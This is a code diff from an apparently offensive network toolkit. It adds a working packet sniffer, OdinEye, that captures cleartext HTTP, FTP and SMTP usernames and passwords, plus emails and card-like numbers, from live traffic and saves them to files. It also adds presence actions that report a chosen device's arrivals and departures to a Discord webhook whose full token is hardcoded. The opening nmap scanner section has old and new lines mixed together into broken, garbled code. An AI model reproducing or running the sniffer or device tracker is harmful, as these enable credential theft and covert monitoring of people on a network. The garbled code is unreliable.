logger.error(f"Error updating summary file: {e}")
def scan_vulnerabilities(self, ip, hostname, mac, ports):
combined_result = ""
success = True # Initialize to True, will become False if an error occurs
# 1) metadata from the queue row
meta = {}
try:
self.shared_data.bjornstatustext2 = ip
meta = json.loads(row.get('metadata') or '{}')
except Exception:
pass
# Proceed with scanning if ports are not already scanned
logger.info(f"Scanning {ip} on ports {','.join(ports)} for vulnerabilities with aggressivity {self.shared_data.nmap_scan_aggressivity}")
result = subprocess.run(
["nmap", self.shared_data.nmap_scan_aggressivity, "-sV", "--script", "vulners.nse", "-p", ",".join(ports), ip],
capture_output=True, text=True
# 2) fetch the MAC address and ALL ports for the host
mac = row.get("MAC Address") or row.get("mac_address") or ""
# ✅ FORCE fetching ALL ports from the DB
ports_str = ""
if mac:
r = self.shared_data.db.query(
"SELECT ports FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
combined_result += result.stdout
if r and r[0].get('ports'):
ports_str = r[0]['ports']
vulnerabilities = self.parse_vulnerabilities(result.stdout)
self.update_summary_file(ip, hostname, mac, ",".join(ports), vulnerabilities)
except Exception as e:
logger.error(f"Error scanning {ip}: {e}")
success = False # Mark as failed if an error occurs
# Fall back to the metadata if needed
if not ports_str:
ports_str = (
row.get("Ports") or row.get("ports") or
meta.get("ports_snapshot") or ""
)
return combined_result if success else None
if not ports_str:
logger.warning(f"⚠️ No ports to scan for {ip}")
return 'failed'
def execute(self, ip, row, status_key):
"""
Executes the vulnerability scan for a given IP and row data.
"""
self.shared_data.bjornorch_status = "NmapVulnScanner"
ports = row["Ports"].split(";")
scan_result = self.scan_vulnerabilities(ip, row["Hostnames"], row["MAC Address"], ports)
ports = [p.strip() for p in ports_str.split(';') if p.strip()]
logger.debug(f"📋 Found {len(ports)} ports for {ip}: {ports[:5]}...")
if scan_result is not None:
self.scan_results.append((ip, row["Hostnames"], row["MAC Address"]))
self.save_results(row["MAC Address"], ip, scan_result)
# ✅ FIX: only filter when the option is enabled AND the host was already scanned
if self.shared_data.config.get('vuln_rescan_on_change_only', False):
if self._has_been_scanned(mac):
original_count = len(ports)
ports = self._filter_ports_already_scanned(mac, ports)
logger.debug(f"🔄 Filtered {original_count - len(ports)} already-scanned ports")
if not ports:
logger.info(f"✅ No new/changed ports to scan for {ip}")
return 'success'
# Scan (fast mode by default)
logger.info(f"🚀 Starting nmap scan on {len(ports)} ports for {ip}")
findings = self.scan_vulnerabilities(ip, ports)
# Persistence (CVE/CPE split)
self.save_vulnerabilities(mac, ip, findings)
logger.success(f"✅ Vuln scan done on {ip}: {len(findings)} entries")
return 'success'
except Exception as e:
logger.error(f"❌ NmapVulnScanner failed for {ip}: {e}")
return 'failed'
def _has_been_scanned(self, mac: str) -> bool:
"""Vérifie si l'hôte a déjà été scanné au moins une fois."""
rows = self.shared_data.db.query("""
SELECT 1 FROM action_queue
WHERE mac_address=? AND action_name='NmapVulnScanner'
AND status IN ('success', 'failed')
LIMIT 1
""", (mac,))
return bool(rows)
def _filter_ports_already_scanned(self, mac: str, ports: List[str]) -> List[str]:
"""
Return the list of ports to scan, excluding those already scanned recently.
"""
if not ports:
return []
# Ports already covered by detected_software (is_active=1)
rows = self.shared_data.db.query("""
SELECT port, last_seen
FROM detected_software
WHERE mac_address=? AND is_active=1 AND port IS NOT NULL
""", (mac,))
seen = {}
for r in rows:
try:
p = str(r['port'])
ls = r.get('last_seen')
seen[p] = ls
except Exception:
pass
ttl = int(self.shared_data.config.get('vuln_rescan_ttl_seconds', 0) or 0)
if ttl > 0:
cutoff = datetime.utcnow() - timedelta(seconds=ttl)
def fresh(port: str) -> bool:
ls = seen.get(port)
if not ls:
return False
try:
dt = datetime.fromisoformat(ls.replace('Z',''))
return dt >= cutoff
except Exception:
return True
return [p for p in ports if (p not in seen) or (not fresh(p))]
else:
return 'success' # considering failed as success as we just need to scan vulnerabilities once
# return 'failed'
# Without a TTL: skip ports already scanned / still marked active
return [p for p in ports if p not in seen]
def parse_vulnerabilities(self, scan_result):
"""
Parses the Nmap scan result to extract vulnerabilities.
"""
vulnerabilities = set()
capture = False
for line in scan_result.splitlines():
if "VULNERABLE" in line or "CVE-" in line or "*EXPLOIT*" in line:
capture = True
if capture:
if line.strip() and not line.startswith('|_'):
vulnerabilities.add(line.strip())
# ---------------------------- Scanning ------------------------------ #
def scan_vulnerabilities(self, ip: str, ports: List[str]) -> List[Dict]:
"""Mode rapide CPE/CVE ou fallback lourd."""
fast = bool(self.shared_data.config.get('vuln_fast', True))
use_vulners = bool(self.shared_data.config.get('nse_vulners', False))
max_ports = int(self.shared_data.config.get('vuln_max_ports', 10 if fast else 20))
p_list = [str(p).split('/')[0] for p in ports if str(p).strip()]
port_list = ','.join(p_list[:max_ports]) if p_list else ''
if not port_list:
logger.warning("No valid ports for scan")
return []
if fast:
return self._scan_fast_cpe_cve(ip, port_list, use_vulners)
else:
capture = False
return "; ".join(vulnerabilities)
return self._scan_heavy(ip, port_list)
def save_results(self, mac_address, ip, scan_result):
"""
Saves the detailed scan results to a file.
"""
def _scan_fast_cpe_cve(self, ip: str, port_list: str, use_vulners: bool) -> List[Dict]:
"""Scan rapide pour récupérer CPE et (option) CVE via vulners."""
vulns: List[Dict] = []
args = "-sV --version-light -T4 --max-retries 1 --host-timeout 30s --script-timeout 10s"
if use_vulners:
args += " --script vulners --script-args mincvss=0.0"
logger.info(f"[FAST] nmap {ip} -p {port_list} ({args})")
try:
sanitized_mac_address = mac_address.replace(":", "")
result_dir = self.shared_data.vulnerabilities_dir
os.makedirs(result_dir, exist_ok=True)
result_file = os.path.join(result_dir, f"{sanitized_mac_address}_{ip}_vuln_scan.txt")
# Open the file in write mode to clear its contents if it exists, then close it
if os.path.exists(result_file):
open(result_file, 'w').close()
# Write the new scan result to the file
with open(result_file, 'w') as file:
file.write(scan_result)
logger.info(f"Results saved to {result_file}")
self.nm.scan(hosts=ip, ports=port_list, arguments=args)
except Exception as e:
logger.error(f"Error saving scan results for {ip}: {e}")
logger.error(f"Fast scan failed to start: {e}")
return vulns
if ip not in self.nm.all_hosts():
return vulns
def save_summary(self):
"""
Saves a summary of all scanned vulnerabilities to a final summary file.
"""
host = self.nm[ip]
for proto in host.all_protocols():
for port in host[proto].keys():
port_info = host[proto][port]
service = port_info.get('name', '') or ''
# 1) CPEs from -sV
cpe_values = self._extract_cpe_values(port_info)
for cpe in cpe_values:
vulns.append({
'port': port,
'service': service,
'vuln_id': f"CPE:{cpe}",
'script': 'service-detect',
'details': f"CPE detected: {cpe}"[:500]
})
# 2) CVEs via the 'vulners' script (if enabled)
try:
final_summary_file = os.path.join(self.shared_data.vulnerabilities_dir, "final_vulnerability_summary.csv")
df = pd.read_csv(self.summary_file)
summary_data = df.groupby(["IP", "Hostname", "MAC Address"])["Vulnerabilities"].apply(lambda x: "; ".join(set("; ".join(x).split("; ")))).reset_index()
summary_data.to_csv(final_summary_file, index=False)
logger.info(f"Summary saved to {final_summary_file}")
except Exception as e:
logger.error(f"Error saving summary: {e}")
script_out = (port_info.get('script') or {}).get('vulners')
if script_out:
for cve in self.extract_cves(script_out):
vulns.append({
'port': port,
'service': service,
'vuln_id': cve,
'script': 'vulners',
'details': str(script_out)[:500]
})
except Exception:
pass
if __name__ == "__main__":
shared_data = SharedData()
return vulns
def _scan_heavy(self, ip: str, port_list: str) -> List[Dict]:
"""Ancienne stratégie (plus lente) avec catégorie vuln, etc."""
vulnerabilities: List[Dict] = []
vuln_scripts = [
'vuln','exploit','http-vuln-*','smb-vuln-*',
'ssl-*','ssh-*','ftp-vuln-*','mysql-vuln-*',
]
script_arg = ','.join(vuln_scripts)
args = f"-sV --script={script_arg} -T3 --script-timeout 20s"
logger.info(f"[HEAVY] nmap {ip} -p {port_list} ({args})")
try:
nmap_vuln_scanner = NmapVulnScanner(shared_data)
logger.info("Starting vulnerability scans...")
# Load the netkbfile and get the IPs to scan
ips_to_scan = shared_data.read_data() # Use your existing method to read the data
# Execute the scan on each IP with concurrency
with Progress(
TextColumn("[progress.description]{task.description}"),
BarColumn(),
"[progress.percentage]{task.percentage:>3.1f}%",
console=Console()
) as progress:
task = progress.add_task("Scanning vulnerabilities...", total=len(ips_to_scan))
futures = []
with ThreadPoolExecutor(max_workers=2) as executor: # Adjust the number of workers for RPi Zero
for row in ips_to_scan:
if row["Alive"] == '1': # Check if the host is alive
ip = row["IPs"]
futures.append(executor.submit(nmap_vuln_scanner.execute, ip, row, b_status))
for future in as_completed(futures):
progress.update(task, advance=1)
nmap_vuln_scanner.save_summary()
logger.info(f"Total scans performed: {len(nmap_vuln_scanner.scan_results)}")
exit(len(nmap_vuln_scanner.scan_results))
self.nm.scan(hosts=ip, ports=port_list, arguments=args)
except Exception as e:
logger.error(f"Error: {e}")
logger.error(f"Heavy scan failed to start: {e}")
return vulnerabilities
if ip in self.nm.all_hosts():
host = self.nm[ip]
discovered_ports: Set[str] = set()
for proto in host.all_protocols():
for port in host[proto].keys():
discovered_ports.add(str(port))
port_info = host[proto][port]
service = port_info.get('name', '') or ''
if 'script' in port_info:
for script_name, output in (port_info.get('script') or {}).items():
for cve in self.extract_cves(str(output)):
vulnerabilities.append({
'port': port,
'service': service,
'vuln_id': cve,
'script': script_name,
'details': str(output)[:500]
})
if bool(self.shared_data.config.get('scan_cpe', False)):
ports_for_cpe = list(discovered_ports) if discovered_ports else port_list.split(',')
cpes = self.scan_cpe(ip, ports_for_cpe[:10])
vulnerabilities.extend(cpes)
return vulnerabilities
# ---------------------------- Helpers -------------------------------- #
def _extract_cpe_values(self, port_info: Dict[str, Any]) -> List[str]:
"""Normalise tous les formats possibles de CPE renvoyés par python-nmap."""
cpe = port_info.get('cpe')
if not cpe:
return []
if isinstance(cpe, str):
parts = [x.strip() for x in cpe.splitlines() if x.strip()]
return parts or [cpe]
if isinstance(cpe, (list, tuple, set)):
return [str(x).strip() for x in cpe if str(x).strip()]
try:
return [str(cpe).strip()] if str(cpe).strip() else []
except Exception:
return []
def extract_cves(self, text: str) -> List[str]:
"""Extrait les identifiants CVE d'un texte."""
import re
if not text:
return []
cve_pattern = r'CVE-\d{4}-\d{4,7}'
return re.findall(cve_pattern, str(text), re.IGNORECASE)
def scan_cpe(self, ip: str, ports: List[str]) -> List[Dict]:
"""(Fallback lourd) Scan CPE détaillé si demandé."""
cpe_vulns: List[Dict] = []
try:
port_list = ','.join([str(p) for p in ports if str(p).strip()])
if not port_list:
return cpe_vulns
args = "-sV --version-all -T3 --max-retries 2 --host-timeout 45s"
logger.info(f"[CPE] nmap {ip} -p {port_list} ({args})")
self.nm.scan(hosts=ip, ports=port_list, arguments=args)
if ip in self.nm.all_hosts():
host = self.nm[ip]
for proto in host.all_protocols():
for port in host[proto].keys():
port_info = host[proto][port]
service = port_info.get('name', '') or ''
for cpe in self._extract_cpe_values(port_info):
cpe_vulns.append({
'port': port,
'service': service,
'vuln_id': f"CPE:{cpe}",
'script': 'version-scan',
'details': f"CPE detected: {cpe}"[:500]
})
except Exception as e:
logger.error(f"CPE scan error: {e}")
return cpe_vulns
# ---------------------------- Persistence ---------------------------- #
def save_vulnerabilities(self, mac: str, ip: str, findings: List[Dict]):
"""Sépare CPE et CVE, met à jour les statuts + enregistre les nouveautés."""
# Fetch the hostname from the DB
hostname = None
try:
host_row = self.shared_data.db.query_one(
"SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1",
(mac,)
)
if host_row and host_row.get('hostnames'):
hostname = host_row['hostnames'].split(';')[0]
except Exception as e:
logger.debug(f"Could not fetch hostname: {e}")
# Group findings by port with their full details
findings_by_port = {}
for f in findings:
port = int(f.get('port', 0) or 0)
if port not in findings_by_port:
findings_by_port[port] = {
'cves': set(),
'cpes': set(),
'findings': []
}
findings_by_port[port]['findings'].append(f)
vid = str(f.get('vuln_id', ''))
if vid.upper().startswith('CVE-'):
findings_by_port[port]['cves'].add(vid)
elif vid.upper().startswith('CPE:'):
findings_by_port[port]['cpes'].add(vid.split(':', 1)[1])
elif vid.lower().startswith('cpe:'):
findings_by_port[port]['cpes'].add(vid)
# 1) Process the CVEs per port
for port, data in findings_by_port.items():
if data['cves']:
for cve in data['cves']:
try:
existing = self.shared_data.db.query_one(
"SELECT id FROM vulnerabilities WHERE mac_address=? AND vuln_id=? AND port=? LIMIT 1",
(mac, cve, port)
)
if existing:
self.shared_data.db.execute("""
UPDATE vulnerabilities
SET ip=?, hostname=?, last_seen=CURRENT_TIMESTAMP, is_active=1
WHERE mac_address=? AND vuln_id=? AND port=?
""", (ip, hostname, mac, cve, port))
else:
self.shared_data.db.execute("""
INSERT INTO vulnerabilities(mac_address, ip, hostname, port, vuln_id, is_active)
VALUES(?,?,?,?,?,1)
""", (mac, ip, hostname, port, cve))
logger.debug(f"Saved CVE {cve} for {ip}:{port}")
except Exception as e:
logger.error(f"Failed to save CVE {cve}: {e}")
# 2) Process the CPEs
for port, data in findings_by_port.items():
for cpe in data['cpes']:
try:
self.shared_data.db.add_detected_software(
mac_address=mac,
cpe=cpe,
ip=ip,
hostname=hostname,
port=port
)
except Exception as e:
logger.error(f"Failed to save CPE {cpe}: {e}")
logger.info(f"Saved vulnerabilities for {ip} ({mac}): {len(findings_by_port)} ports processed")

416
actions/odin_eye.py Normal file
View File

@@ -0,0 +1,416 @@
import os
try:
import psutil
except Exception:
psutil = None
def _list_net_ifaces() -> list[str]:
names = set()
# 1) psutil if available
if psutil:
try:
names.update(ifname for ifname in psutil.net_if_addrs().keys() if ifname != "lo")
except Exception:
pass
# 2) kernel fallback
try:
for n in os.listdir("/sys/class/net"):
if n and n != "lo":
names.add(n)
except Exception:
pass
out = ["auto"] + sorted(names)
# safety: no duplicates
seen, unique = set(), []
for x in out:
if x not in seen:
unique.append(x); seen.add(x)
return unique
# Hook called by the backend before the UI is rendered / the DB is synced
def compute_dynamic_b_args(base: dict) -> dict:
"""
Compute dynamic arguments at runtime.
Called by the web interface to populate dropdowns, etc.
"""
d = dict(base or {})
    # Example: dynamic interface list
    if "interface" in d:
        # Reuse the helper above; it already falls back to /sys/class/net when psutil is unavailable.
        d["interface"]["choices"] = _list_net_ifaces()
return d
# --- ADDITIONAL UI METADATA ---------------------------------------------------
# Example argument sets (rendered by the frontend; also persisted to the DB via sync_actions)
b_examples = [
{"interface": "auto", "filter": "http or ftp", "timeout": 120, "max_packets": 5000, "save_credentials": True},
{"interface": "wlan0", "filter": "(http or smtp) and not broadcast", "timeout": 300, "max_packets": 10000},
]
# Markdown doc link (can be a local path served by the frontend, or an http(s) URL)
# Example: a markdown README stored in the repo
b_docs_url = "docs/actions/OdinEye.md"
# --- Action metadata (consumed by shared.generate_actions_json) --------------
b_class = "OdinEye"
b_module = "odin_eye" # nom du fichier sans .py
b_enabled = 0
b_action = "normal"
b_category = "recon"
b_name = "Odin Eye"
b_description = (
"Network traffic analyzer for capturing and analyzing data patterns and credentials.\n"
"Requires: tshark (sudo apt install tshark) + pyshark (pip install pyshark)."
)
b_author = "Fabien / Cyberviking"
b_version = "1.0.0"
b_icon = "OdinEye.png"
# Argument schema for the dynamic UI (key == flag name without '--')
b_args = {
"interface": {
"type": "select", "label": "Network Interface",
"choices": [], # <- Laisser vide: rempli dynamiquement par compute_dynamic_b_args(...)
"default": "auto",
"help": "Interface à écouter. 'auto' tente de détecter l'interface par défaut." },
"filter": {"type": "text", "label": "BPF Filter", "default": "(http or ftp or smtp or pop3 or imap or telnet) and not broadcast"},
"output": {"type": "text", "label": "Output dir", "default": "/home/bjorn/Bjorn/data/output/packets"},
"timeout": {"type": "number", "label": "Timeout (s)", "min": 10, "max": 36000, "step": 1, "default": 300},
"max_packets": {"type": "number", "label": "Max packets", "min": 100, "max": 2000000, "step": 100, "default": 10000},
}
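# Illustrative: the web UI is expected to call compute_dynamic_b_args(b_args) before rendering,
# so "interface" -> "choices" ends up as e.g. ["auto", "eth0", "wlan0"] on a typical device.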
# ----------------- Analysis code (existing capture logic) -------------------
import os, json, pyshark, argparse, logging, re, threading, signal
from datetime import datetime
from collections import defaultdict
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/packets"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "odin_eye_settings.json")
DEFAULT_FILTER = "(http or ftp or smtp or pop3 or imap or telnet) and not broadcast"
CREDENTIAL_PATTERNS = {
'http': {
'username': [r'username=([^&]+)', r'user=([^&]+)', r'login=([^&]+)'],
'password': [r'password=([^&]+)', r'pass=([^&]+)']
},
'ftp': {
'username': [r'USER\s+(.+)', r'USERNAME\s+(.+)'],
'password': [r'PASS\s+(.+)']
},
'smtp': {
'auth': [r'AUTH\s+PLAIN\s+(.+)', r'AUTH\s+LOGIN\s+(.+)']
}
}
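# Illustrative: re.findall(CREDENTIAL_PATTERNS['http']['username'][0], "login?username=alice&password=x")
# returns ['alice']; the analyze_* methods below apply these patterns to decoded packet fields.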
class OdinEye:
def __init__(self, interface, capture_filter=DEFAULT_FILTER, output_dir=DEFAULT_OUTPUT_DIR,
timeout=300, max_packets=10000):
self.interface = interface
self.capture_filter = capture_filter
self.output_dir = output_dir
self.timeout = timeout
self.max_packets = max_packets
self.capture = None
self.stop_capture = threading.Event()
self.statistics = defaultdict(int)
self.credentials = []
self.interesting_patterns = []
self.lock = threading.Lock()
def process_packet(self, packet):
try:
with self.lock:
self.statistics['total_packets'] += 1
if hasattr(packet, 'highest_layer'):
self.statistics[packet.highest_layer] += 1
if hasattr(packet, 'tcp'):
self.analyze_tcp_packet(packet)
except Exception as e:
logging.error(f"Error processing packet: {e}")
def analyze_tcp_packet(self, packet):
try:
if hasattr(packet, 'http'):
self.analyze_http_packet(packet)
elif hasattr(packet, 'ftp'):
self.analyze_ftp_packet(packet)
elif hasattr(packet, 'smtp'):
self.analyze_smtp_packet(packet)
if hasattr(packet.tcp, 'payload'):
self.analyze_payload(packet.tcp.payload)
except Exception as e:
logging.error(f"Error analyzing TCP packet: {e}")
def analyze_http_packet(self, packet):
try:
if hasattr(packet.http, 'request_uri'):
for field in ['username', 'password']:
for pattern in CREDENTIAL_PATTERNS['http'][field]:
matches = re.findall(pattern, packet.http.request_uri)
if matches:
with self.lock:
self.credentials.append({
'protocol': 'HTTP',
'type': field,
'value': matches[0],
'timestamp': datetime.now().isoformat(),
'source': packet.ip.src if hasattr(packet, 'ip') else None
})
except Exception as e:
logging.error(f"Error analyzing HTTP packet: {e}")
def analyze_ftp_packet(self, packet):
try:
if hasattr(packet.ftp, 'request_command'):
cmd = packet.ftp.request_command.upper()
if cmd in ['USER', 'PASS']:
with self.lock:
self.credentials.append({
'protocol': 'FTP',
'type': 'username' if cmd == 'USER' else 'password',
'value': packet.ftp.request_arg,
'timestamp': datetime.now().isoformat(),
'source': packet.ip.src if hasattr(packet, 'ip') else None
})
except Exception as e:
logging.error(f"Error analyzing FTP packet: {e}")
def analyze_smtp_packet(self, packet):
try:
if hasattr(packet.smtp, 'command_line'):
for pattern in CREDENTIAL_PATTERNS['smtp']['auth']:
matches = re.findall(pattern, packet.smtp.command_line)
if matches:
with self.lock:
self.credentials.append({
'protocol': 'SMTP',
'type': 'auth',
'value': matches[0],
'timestamp': datetime.now().isoformat(),
'source': packet.ip.src if hasattr(packet, 'ip') else None
})
except Exception as e:
logging.error(f"Error analyzing SMTP packet: {e}")
def analyze_payload(self, payload):
patterns = {
'email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
'credit_card': r'\b\d{4}[- ]?\d{4}[- ]?\d{4}[- ]?\d{4}\b',
'ip_address': r'\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
}
for name, pattern in patterns.items():
matches = re.findall(pattern, payload)
if matches:
with self.lock:
self.interesting_patterns.append({
'type': name,
'value': matches[0],
'timestamp': datetime.now().isoformat()
})
def save_results(self):
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
stats_file = os.path.join(self.output_dir, f"capture_stats_{timestamp}.json")
with open(stats_file, 'w') as f:
json.dump(dict(self.statistics), f, indent=4)
if self.credentials:
creds_file = os.path.join(self.output_dir, f"credentials_{timestamp}.json")
with open(creds_file, 'w') as f:
json.dump(self.credentials, f, indent=4)
if self.interesting_patterns:
patterns_file = os.path.join(self.output_dir, f"patterns_{timestamp}.json")
with open(patterns_file, 'w') as f:
json.dump(self.interesting_patterns, f, indent=4)
logging.info(f"Results saved to {self.output_dir}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def execute(self):
try:
# Timeout thread (unchanged)
if self.timeout and self.timeout > 0:
def _stop_after():
self.stop_capture.wait(self.timeout)
self.stop_capture.set()
threading.Thread(target=_stop_after, daemon=True).start()
logging.info(f"Starting capture on {self.interface} (filter: {self.capture_filter}, timeout: {self.timeout}s)")
self.capture = pyshark.LiveCapture(interface=self.interface, bpf_filter=self.capture_filter)
# Graceful interruption; SKIP when running in importlib (thread) mode
if os.environ.get("BJORN_EMBEDDED") != "1":
try:
signal.signal(signal.SIGINT, self.handle_interrupt)
signal.signal(signal.SIGTERM, self.handle_interrupt)
except Exception:
# e.g. ValueError if not called from the main thread
pass
for packet in self.capture.sniff_continuously():
if self.stop_capture.is_set() or self.statistics['total_packets'] >= self.max_packets:
break
self.process_packet(packet)
except Exception as e:
logging.error(f"Capture error: {e}")
finally:
self.cleanup()
def handle_interrupt(self, signum, frame):
self.stop_capture.set()
def cleanup(self):
if self.capture:
self.capture.close()
self.save_results()
logging.info("Capture completed")
def save_settings(interface, capture_filter, output_dir, timeout, max_packets):
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"interface": interface,
"capture_filter": capture_filter,
"output_dir": output_dir,
"timeout": timeout,
"max_packets": max_packets
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="OdinEye: network traffic analyzer & credential hunter")
parser.add_argument("-i", "--interface", required=False, help="Network interface to monitor")
parser.add_argument("-f", "--filter", default=DEFAULT_FILTER, help="BPF capture filter")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
parser.add_argument("-t", "--timeout", type=int, default=300, help="Capture timeout in seconds")
parser.add_argument("-m", "--max-packets", type=int, default=10000, help="Maximum packets to capture")
args = parser.parse_args()
settings = load_settings()
interface = args.interface or settings.get("interface")
capture_filter = args.filter or settings.get("capture_filter", DEFAULT_FILTER)
output_dir = args.output or settings.get("output_dir", DEFAULT_OUTPUT_DIR)
timeout = args.timeout or settings.get("timeout", 300)
max_packets = args.max_packets or settings.get("max_packets", 10000)
if not interface:
logging.error("Interface is required. Use -i or set it in settings")
return
save_settings(interface, capture_filter, output_dir, timeout, max_packets)
analyzer = OdinEye(interface, capture_filter, output_dir, timeout, max_packets)
analyzer.execute()
if __name__ == "__main__":
main()
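# Illustrative embedded-mode sketch (assumption: values are examples only): how the
# orchestrator side could run this module in a worker thread instead of via the CLI.
# BJORN_EMBEDDED=1 makes execute() skip the signal handlers, which would raise
# outside the main thread.
#
#   os.environ["BJORN_EMBEDDED"] = "1"
#   analyzer = OdinEye(interface="wlan0", timeout=120, max_packets=5000)
#   threading.Thread(target=analyzer.execute, daemon=True).start()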
"""
# action_template.py
# Example template for a Bjorn action with Neo launcher support
# UI Metadata
b_class = "MyAction"
b_module = "my_action"
b_enabled = 1
b_action = "normal" # normal, aggressive, stealth
b_description = "Description of what this action does"
# Arguments schema for UI
b_args = {
"target": {
"type": "text",
"label": "Target IP/Host",
"default": "192.168.1.1",
"placeholder": "Enter target",
"help": "The target to scan"
},
"port": {
"type": "number",
"label": "Port",
"default": 80,
"min": 1,
"max": 65535
},
"protocol": {
"type": "select",
"label": "Protocol",
"choices": ["tcp", "udp"],
"default": "tcp"
},
"verbose": {
"type": "checkbox",
"label": "Verbose output",
"default": False
},
"timeout": {
"type": "slider",
"label": "Timeout (seconds)",
"min": 10,
"max": 300,
"step": 10,
"default": 60
}
}
def compute_dynamic_b_args(base: dict) -> dict:
# Compute dynamic values at runtime
return base
import argparse
import sys
def main():
parser = argparse.ArgumentParser(description=b_description)
parser.add_argument('--target', default=b_args['target']['default'])
parser.add_argument('--port', type=int, default=b_args['port']['default'])
parser.add_argument('--protocol', choices=b_args['protocol']['choices'],
default=b_args['protocol']['default'])
parser.add_argument('--verbose', action='store_true')
parser.add_argument('--timeout', type=int, default=b_args['timeout']['default'])
args = parser.parse_args()
# Your action logic here
print(f"Starting action with target: {args.target}")
# ...
if __name__ == "__main__":
main()
"""

82
actions/presence_join.py Normal file
View File

@@ -0,0 +1,82 @@
# actions/presence_join.py
# -*- coding: utf-8 -*-
"""
PresenceJoin — Sends a Discord webhook when the targeted host JOINS the network.
- Triggered by the scheduler ONLY on transition OFF->ON (b_trigger="on_join").
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
- The action does not query anything: it only notifies when called.
"""
import requests
from typing import Optional
import logging
from datetime import datetime, timezone
from logger import Logger
from shared import SharedData # only if executed directly for testing
logger = Logger(name="PresenceJoin", level=logging.DEBUG)
# --- Metadata (truth is in DB; here for reference/consistency) --------------
b_class = "PresenceJoin"
b_module = "presence_join"
b_status = "PresenceJoin"
b_port = None
b_service = None
b_parent = None
b_priority = 90
b_cooldown = 0 # not needed: on_join only fires on join transition
b_rate_limit = None
b_trigger = "on_join" # <-- Host JOINED the network (OFF -> ON since last scan)
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
# Replace with your webhook
DISCORD_WEBHOOK_URL = "https://discordapp.com/api/webhooks/1416433823456956561/MYc2mHuqgK_U8tA96fs2_-S1NVchPzGOzan9EgLr4i8yOQa-3xJ6Z-vMejVrpPfC3OfD"
class PresenceJoin:
def __init__(self, shared_data):
self.shared_data = shared_data
def _send(self, text: str) -> None:
if not DISCORD_WEBHOOK_URL or "webhooks/" not in DISCORD_WEBHOOK_URL:
logger.error("PresenceJoin: DISCORD_WEBHOOK_URL missing/invalid.")
return
try:
r = requests.post(DISCORD_WEBHOOK_URL, json={"content": text}, timeout=6)
if r.status_code < 300:
logger.info("PresenceJoin: webhook sent.")
else:
logger.error(f"PresenceJoin: HTTP {r.status_code}: {r.text}")
except Exception as e:
logger.error(f"PresenceJoin: webhook error: {e}")
def execute(self, ip: Optional[str], port: Optional[str], row: dict, status_key: str):
"""
Called by the orchestrator when the scheduler detected the join.
ip/port = host targets (if known), row = host info.
"""
try:
mac = row.get("MAC Address") or row.get("mac_address") or "MAC"
host = row.get("hostname") or (row.get("hostnames") or "").split(";")[0] if row.get("hostnames") else None
name = f"{host} ({mac})" if host else mac
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
# Add timestamp in UTC
timestamp = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
msg = f"✅ **Presence detected**\n"
msg += f"- Host: {host or 'unknown'}\n"
msg += f"- MAC: {mac}\n"
if ip_s:
msg += f"- IP: {ip_s}\n"
msg += f"- Time: {timestamp}"
self._send(msg)
return "success"
except Exception as e:
logger.error(f"PresenceJoin error: {e}")
return "failed"
if __name__ == "__main__":
sd = SharedData()
logger.info("PresenceJoin ready (direct mode).")

82
actions/presence_left.py Normal file
View File

@@ -0,0 +1,82 @@
# actions/presence_left.py
# -*- coding: utf-8 -*-
"""
PresenceLeave — Sends a Discord webhook when the targeted host LEAVES the network.
- Triggered by the scheduler ONLY on transition ON->OFF (b_trigger="on_leave").
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
- The action does not query anything: it only notifies when called.
"""
import requests
from typing import Optional
import logging
from datetime import datetime, timezone
from logger import Logger
from shared import SharedData # only if executed directly for testing
logger = Logger(name="PresenceLeave", level=logging.DEBUG)
# --- Metadata (truth is in DB; here for reference/consistency) --------------
b_class = "PresenceLeave"
b_module = "presence_left"
b_status = "PresenceLeave"
b_port = None
b_service = None
b_parent = None
b_priority = 90
b_cooldown = 0 # not needed: on_leave only fires on leave transition
b_rate_limit = None
b_trigger = "on_leave" # <-- Host LEFT the network (ON -> OFF since last scan)
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
b_enabled = 1
# Replace with your webhook (can reuse the same as PresenceJoin)
DISCORD_WEBHOOK_URL = "https://discordapp.com/api/webhooks/1416433823456956561/MYc2mHuqgK_U8tA96fs2_-S1NVchPzGOzan9EgLr4i8yOQa-3xJ6Z-vMejVrpPfC3OfD"
class PresenceLeave:
def __init__(self, shared_data):
self.shared_data = shared_data
def _send(self, text: str) -> None:
if not DISCORD_WEBHOOK_URL or "webhooks/" not in DISCORD_WEBHOOK_URL:
logger.error("PresenceLeave: DISCORD_WEBHOOK_URL missing/invalid.")
return
try:
r = requests.post(DISCORD_WEBHOOK_URL, json={"content": text}, timeout=6)
if r.status_code < 300:
logger.info("PresenceLeave: webhook sent.")
else:
logger.error(f"PresenceLeave: HTTP {r.status_code}: {r.text}")
except Exception as e:
logger.error(f"PresenceLeave: webhook error: {e}")
def execute(self, ip: Optional[str], port: Optional[str], row: dict, status_key: str):
"""
Called by the orchestrator when the scheduler detected the disconnection.
ip/port = last known target (if available), row = host info.
"""
try:
mac = row.get("MAC Address") or row.get("mac_address") or "MAC"
